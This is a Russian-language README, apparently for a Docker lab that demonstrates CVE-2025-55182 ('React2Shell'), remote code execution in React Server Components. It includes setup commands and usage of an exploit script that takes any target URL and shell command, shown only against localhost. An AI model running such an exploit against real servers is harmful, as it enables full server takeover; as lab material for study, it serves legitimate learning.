
Практическая лаборатория для изучения и эксплуатации CVE-2025-55182 (React2Shell) - удалённое выполнение кода в React Server Components
Практическая лаборатория для эксплуатации CVE-2025-55182 (React2Shell) — удалённое выполнение кода в React Server Components.
Только в образовательных целях. Тестируйте только на системах, которыми владеете.
# Clone and start
git clone https://github.com/dhananjayakumarn/CVE-2025-55182-Lab.git
cd CVE-2025-55182-Lab
docker-compose up -d
# Wait 20 seconds, then exploit
python3 exploit.py http://localhost:3000 "whoami"
Вот и всё! Вы должны увидеть вывод команды, подтверждающий RCE.
Критическая уязвимость RCE в React Server Components (CVSS 10.0).
Затронуты:
Воздействие: Один HTTP-запрос = полный контроль над сервером
python3 exploit.py <target> <command>
# Examples
python3 exploit.py http://localhost:3000 "whoami"
python3 exploit.py http://localhost:3000 "id"
python3 exploit.py http://localhost:3000 "ls -la"
docker-compose down
⭐ Поставьте звезду, если это помогло вам в обучении!